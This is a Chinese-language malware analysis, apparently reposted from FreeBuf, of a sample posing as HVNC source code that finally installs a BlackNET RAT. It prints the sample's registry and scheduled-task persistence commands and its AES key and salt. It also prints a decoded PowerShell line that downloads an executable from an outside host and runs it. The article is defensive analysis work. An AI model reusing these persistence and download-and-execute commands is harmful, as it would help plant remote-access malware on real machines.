伪装成HVNC源码的恶意软件分析

一级程序

"Remove -ItemProperty -Path 'HKCU:SOFTWAREMicrosoftWindowsCurrentVersionRun' -Name 'WindowsDefenderScreen';New-ItemProperty -Path 'HKCU:SOFTWAREMicrosoftWindowsCurrentVersionRun' -Name 'WindowsDefenderScreen' -Value '""C:UsersxxxxxAppDataRoamingWindowsDefenderScreenWindowsDefenderScreen.exe""' -PropertyType 'String'"

(向右滑动，查看更多)

是Administrator权限:

cmd /C schtasks /create /tn WindowsDefenderScreen /tr "C:UsersxxxxxAppDataRoamingWindowsDefenderScreenWindowsDefenderScreen.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

(向右滑动，查看更多)


非Administrator权限:








cmd /C schtasks /create /tn WindowsDefenderScreen /tr "C:UsersxxxxxAppDataRoamingWindowsDefenderScreenWindowsDefenderScreen.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /f

(向右滑动，查看更多)



接下来进入正常执行流程：


首先通过GetManifestResourceStream获取rZJsQDE9Fv的资源文件，然后对资源文件进行解密，用的AES算法，其中密钥为zEP2yn51xz，salt为{26,20,202,234,136,123,69,47}，模式为CBC，具体可以看下图：






解密后会通过注入到


C:WindowsMicrosoft.NETFrameworkv4.0.30319RegAsm.exe运行，这里直接将解密数据提取分析。



二级程序


上面提取出来的程序如下：






此程序主要是通过ShellExecuteA与EnumResourceNamesA释放并打开
C:UsersxxxxxAppDataRoamingHYPERVISOR.SLN
C:UsersxxxxxAppDataRoamingWINDOWSDEFENDERSCREEN.EXE造成是正常Visual Studio工程的假象。






三级与四级


二级程序释放的新的WINDOWSDEFENDERSCREEN.EXE是一个.net程序，程序逻辑和第一个.net程序完全一样只是资源文件变了，提取出四级程序，和二级程序一样释放资源文件这次一共释放了10个.net文件：






每个文件都是使用PowerShell运行base64编码后的代码，以BLACK.exe为例：






解码后代码：






<#ytg#>Start-Sleep -Seconds 10;(New-Object System.Net.WebClient).DownloadFile('https://zenginlerclubmuck.xyz/DontDelete/Blacknet/l/blacknet%20L.exe', <#gan#> (Join-Path <#iya#> -Path $env:AppData <#gqq#> -ChildPath 'Black.exe'))<#gld#>; Start-Process -FilePath <#jce#> (Join-Path -Path $env:AppData <#xtl#> -ChildPath 'Black.exe')<#ews#>

(向右滑动，查看更多)



通过网络下载远控程序。


前置程序利用了大量的程序间调用，意图躲避杀软：



















远程控制分析








zenginlerclubmuck.xyz的网站已经连接不上了，只能查到相关缓存。







通过一顿查找找到了
https://zenginlerclubmuck.xyz/DontDelete/Blacknet/p/black P.exe的文件缓存。








又是一个.net程序，de4dot能识别为Babel.Net但无法反混淆，在dnspy中查看类型引用，发现GZipStream，猜测用来解压缩Payload，便在此处下断点进行动态调试，在断点处停止后，代码已经出来了。






这里CheckFile 是将文件放在
C:UsersxxxxxxAppDataRoamingWindows SecurityWindows Security.exe  并添加开机自启。


后面通过Gzip解压缩Payload，直接提取rawAssembly与array3，主要恶意程序在array3中。






可以知道这个程序包括了虚拟机判断，屏幕截图，键盘记录，凭据窃取，DDOS等功能。


通过对其特征判断，很明显这是基于BlackNET RAT制作恶意程序，对详细技术感兴趣的可以去看参考链接中的2，3。


参考链接：

https://github.com/henriksb/ExtensionSpoofer


https://labs.k7computing.com/index.php/dark-side-of-blacknet-rat/


https://labs.k7computing.com/index.php/dark-side-of-blacknet-rat-part-2/





















精彩推荐


































原文始发于微信公众号（FreeBuf）：伪装成HVNC源码的恶意软件分析